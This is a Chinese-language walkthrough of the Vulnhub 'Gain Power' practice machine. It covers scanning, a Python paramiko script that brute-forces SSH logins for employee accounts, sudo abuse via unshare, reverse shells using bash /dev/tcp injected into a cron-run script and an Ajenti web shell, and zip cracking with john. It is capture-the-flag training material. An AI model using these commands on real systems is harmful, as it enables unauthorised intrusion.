Vulnhub之Gain Power靶机详细测试过程

Gain Power

识别目标主机IP地址

1. (kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
4. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
6. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
7. _____________________________________________________________________________
8.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
9. -----------------------------------------------------------------------------
10. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
11. 192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH                                                   
12. 192.168.56.254  08:00:27:57:a3:c2      1      60  PCS Systemtechnik GmbH        

复制代码

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDT
4. Nmap scan report for bogon (192.168.56.254)
5. Host is up (0.00015s latency).
6. Not shown: 65532 closed tcp ports (reset)
7. PORT     STATE SERVICE VERSION
8. 22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 88416111e11f187dd60c38292579162c (RSA)
11. |   256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)
12. |_  256 84c514e4e93321416a9272b9a7331aea (ED25519)
13. 80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
14. |_http-title: Watch shop | eCommers
15. | http-methods:
16. |_  Potentially risky methods: TRACE
17. |_http-server-header: Apache/2.4.6 (CentOS)
18. 8000/tcp open  http    Ajenti http control panel
19. |_http-title: Ajenti
20. MAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)
22. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
23. Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds

复制代码

NMAP扫描结果表明目标主机有3个开放端口：22（ssh)、80(http)、8000（http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ nikto -h http://192.168.56.254/
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-05-01 09:17:44 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.6 (CentOS)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
15. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
16. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
17. + OSVDB-3092: /readme.txt: This might be interesting...
18. + OSVDB-3268: /secret/: Directory indexing found.
19. + OSVDB-3092: /secret/: This might be interesting...
20. + OSVDB-3268: /icons/: Directory indexing found.
21. + OSVDB-3233: /icons/README: Apache default file found.
22. + /login.html: Admin login page/section found.
23. + OSVDB-3092: /test.php: This might be interesting...
24. + 8725 requests: 0 error(s) and 13 item(s) reported on remote host
25. + End Time:           2023-05-01 09:18:38 (GMT-4) (54 seconds)
26. ---------------------------------------------------------------------------
27. + 1 host(s) tested

复制代码

nikto工具扫描出目录/secret,访问该目录，将该目录下的图片文件下载到Kali Linux本地进行分析。
但是图片分析没有得到任何有意的结果。

1. └─$ ssh root@192.168.56.254                                       
2. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
3. ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.
4. This key is not known by any other names.
5. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
6. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
7. Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
9.    ___      _        ___                    
10.   / __|__ _(_)_ _   | _ \_____ __ _____ _ _
11. | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
12.   \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
15. I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
17. I already told the format of password of everyone in the yesterday's metting.
19. Now i have configured everything. My request is to everyone to Complete assignments on time
21. btw one of my employee have sudo powers because he is my favourite
23. NOTE : "This message will automatically removed after 2 days"
24.                                                                 - BOSS
26. root@192.168.56.254's password:

复制代码

假设用户名为employee1,根据作者提示，可能密码与用户名有一定规律，比如跟用户名相同
从home家目录来看有coworker, helper，以及employee，而只有其中一个employee有sudo 权限，因此需要编写脚本找出哪个employee有sudo 权限

1. import paramiko
2. import sys
3. import time
5. class GainPowerCls:
6.     def __init__(self) -> None:
7.         self.host = '192.168.56.254'   # IP address of the virtual machine(target)
8.         print("Target: %s" % self.host)
9.         try:         
10.             self.ssh_client = paramiko.SSHClient()
11.             self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())            
13.         except Exception as e:
14.             print("Something is wrong: %s" % e)
15.             sys.exit()
18.     def run_sudo(self,username, password):
19.         try:
20.             print('Attempt to access by %s: %s' % (username, password))
21.             self.ssh_client.connect(hostname=self.host,username=username, password=password)
22.             transport = self.ssh_client.get_transport()
23.             # Return the underlying .Transport object for this SSH connection. This can be used to perform lower-level tasks, like opening specific kinds of channels.
24.             session = transport.open_session()
25.             # Request a new channel to the server, of type "session". This is just an alias for calling open_channel with an argument of "session"
26.             session.set_combine_stderr(True)
27.             # Set whether stderr should be combined into stdout on this channel. The default is False, but in some cases it may be convenient to have both streams combined.
28.             session.get_pty()
29.             #Request a pseudo-terminal from the server. This is usually used right after creating a client channel, to ask the server to provide some basic terminal semantics for a shell invoked with invoke_shell. It isn't necessary (or desirable) to call this method if you're going to execute a single command with exec_command.
30.             session.exec_command('sudo -l')
31.             stdin = session.makefile('wb',-1)
32.             stdout = session.makefile('rb',-1)
33.             stdin.write(password+'\n')
34.             stdin.flush()
35.             print(stdout.read().decode('utf-8'))
36.             session.close()
37.             self.ssh_client.close()
38.         except Exception as e:
39.             print(e)
40.             sys.exit()
42.     def run(self):
43.         for i in range(1,101):
44.             username = 'employee' + str(i)
45.             password = 'employee' + str(i)
46.             self.run_sudo(username, password)
47.             print('*'*150)
48.             time.sleep(1)
50. if __name__ == '__main__':
51.     client = GainPowerCls()
52.     client.run()

复制代码

运行上述python脚本可知employee64拥有sudo 权限

1. employee64
2. [sudo] password for employee64:
3. Matching Defaults entries for employee64 on localhost:
4.     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
5.     env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
6.     env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
7.     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
8.     env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
9.     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
10.     secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
12. User employee64 may run the following commands on localhost:
13.     (programmer) /usr/bin/unshare
15. ******************************************************************************************************************************************************

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ ssh employee64@192.168.56.254
3. Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
5.    ___      _        ___                    
6.   / __|__ _(_)_ _   | _ \_____ __ _____ _ _
7. | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
8.   \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
11. I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
13. I already told the format of password of everyone in the yesterday's metting.
15. Now i have configured everything. My request is to everyone to Complete assignments on time
17. btw one of my employee have sudo powers because he is my favourite
19. NOTE : "This message will automatically removed after 2 days"
20.                                                                 - BOSS
22. employee64@192.168.56.254's password:
23. Permission denied, please try again.
24. employee64@192.168.56.254's password:
25. Last failed login: Mon May  1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:notty
26. There was 1 failed login attempt since the last successful login.
27. Last login: Mon May  1 22:30:52 2023 from 192.168.56.206
28. [employee64@localhost ~]$ id
29. uid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

复制代码

通过unshare执行不同的命名空间的bash从而得到programmer的shell

1. [employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
2. [sudo] password for employee64:
3. bash-4.2$ id
4. uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
5. bash-4.2$

复制代码

这样我们就得到了programmer的shell

1. bash-4.2$ pwd
2. /media/programmer/scripts
3. bash-4.2$ cat backup.sh
4. #!/bin/bash
5. cp /var/www/html/thisiscarddetails.txt /tmp/back.txt

复制代码

在/media/programmer/scripts有脚本，会被定期执行
将pspy64工具上传至目标主机的/tmp目录

1. bash-4.2$ cd /tmp
2. bash-4.2$ wget http://192.168.56.206:8000/pspy64
3. --2023-05-01 22:42:29--  http://192.168.56.206:8000/pspy64
4. Connecting to 192.168.56.206:8000... connected.
5. HTTP request sent, awaiting response... 200 OK
6. Length: 3104768 (3.0M) [application/octet-stream]
7. Saving to: ‘pspy64’
9. 100%[====================================================================================>] 3,104,768   --.-K/s   in 0.01s   
11. 2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]
13. bash-4.2$ chmod +x pspy64

复制代码

1. 2023/05/01 22:44:01 CMD: UID=1183  PID=25118  | /bin/bash /media/programmer/scripts/backup.sh

复制代码

可知backup.sh会被UID为1183的用户定期执行
查看/etc/passwd文件可知UID为1183的用户为vanshal

1. bash-4.2$ ls -alh
2. total 4.0K
3. drwxr-xr-x. 2 programmer prome 23 May 18  2020 .
4. drwxrwx---. 3 programmer prome 21 Aug  8  2019 ..
5. -rwxr-xr-x. 1 programmer prome 65 May 18  2020 backup.sh

复制代码

programmer用户对backup.sh脚本有修改权限

1. bash-4.2$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' >> backup.sh

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130
6. bash: no job control in this shell
7. [vanshal@localhost ~]$ id
8. id
9. uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
10. You have mail in /var/mail/vanshal

复制代码

稍微等会就可以得到vanshal的shell

1. [vanshal@localhost ~]$ cat loc
2. cat local.txt
4.                 ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
5.                 ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
6.                 ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
7.                 ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
8.                 ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
9.                 ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
12.                    You successfully owned the user of this box :-) Best of Luck for the root
15. flag: 5c2a29d7b95868da9e503502f301e8dd
17. Twitter : VanshalG

复制代码

得到了用户flag
家目录下有文件secret.zip，将其下载到Kali Linux本地

1. ──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ wget http://192.168.56.254:9999/secret.zip
3. --2023-05-01 22:52:19--  http://192.168.56.254:9999/secret.zip
4. Connecting to 192.168.56.254:9999... connected.
5. HTTP request sent, awaiting response... 200 OK
6. Length: 439 [application/zip]
7. Saving to: ‘secret.zip’
9. secret.zip                      100%[=====================================================>]     439  --.-KB/s    in 0s      
11. 2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ unzip secret.zip   
3. Archive:  secret.zip
4. [secret.zip] Mypasswords.txt password:                                                                                                                              
5. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
6. └─$ zip2john secret.zip > secret_hash
7. ver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8
9. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
10. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash
11. Using default input encoding: UTF-8
12. Loaded 1 password hash (PKZIP [32/64])
13. Will run 2 OpenMP threads
14. Press 'q' or Ctrl-C to abort, almost any other key for status
15. 81237900         (secret.zip/Mypasswords.txt)     
16. 1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210
17. Use the "--show" option to display all of the cracked passwords reliably
18. Session completed.

复制代码

破解得到了文件的密码

1. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ unzip secret.zip
3. Archive:  secret.zip
4. [secret.zip] Mypasswords.txt password:
5.   inflating: Mypasswords.txt         
7. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
8. └─$ cat Mypasswords.txt               
9. aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB

复制代码

用上述密码可以成功访问8000端口，用户名为root
有webshell,可以运行任何命令

1. bash -i >& /dev/tcp/192.168.56.206/8888 0>&1

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
2. └─$ sudo nc -nlvp 8888                                         
3. [sudo] password for kali:
4. listening on [any] 8888 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550
6. [root@localhost /]# id
7. id
8. uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
9. [root@localhost /]# cd /root
10. cd /root
11. [root@localhost root]# ls -alh
12. ls -alh
13. total 28K
14. dr-xr-x---.  3 root root  132 Jun 21  2020 .
15. dr-xr-xr-x. 18 root root  240 Aug  7  2019 ..
16. -rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
17. -rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
18. -rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
19. -rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
20. drwxr-----.  3 root root   19 Aug  7  2019 .pki
21. -rw-r--r--.  1 root root 2.1K May 18  2020 proof.txt
22. -rw-------.  1 root root 1.0K Aug  7  2019 .rnd
23. -rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
24. [root@localhost root]# cat proof.txt
25. cat proof.txt
27.         ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
28.         ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
29.         ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
30.         ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
31.         ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
32.         ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
34. _________                                     __        .__          __  .__               
35. \_   ___ \  ____   ____    ________________ _/  |_ __ __|  | _____ _/  |_|__| ____   ____  
36. /    \  \/ /  _ \ /    \  / ___\_  __ \__  \\   __\  |  \  | \__  \\   __\  |/  _ \ /    \
37. \     \___(  <_> )   |  \/ /_/  >  | \// __ \|  | |  |  /  |__/ __ \|  | |  (  <_> )   |  \
38. \______  /\____/|___|  /\___  /|__|  (____  /__| |____/|____(____  /__| |__|\____/|___|  /
39.         \/            \//_____/            \/                     \/                    \/
42. You successfully owned the root of this box :-)
44. Flag: eb2e174c3883ff6b5fd871167795b4d6
46. Twitter : VanshalG
47. [root@localhost root]#

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！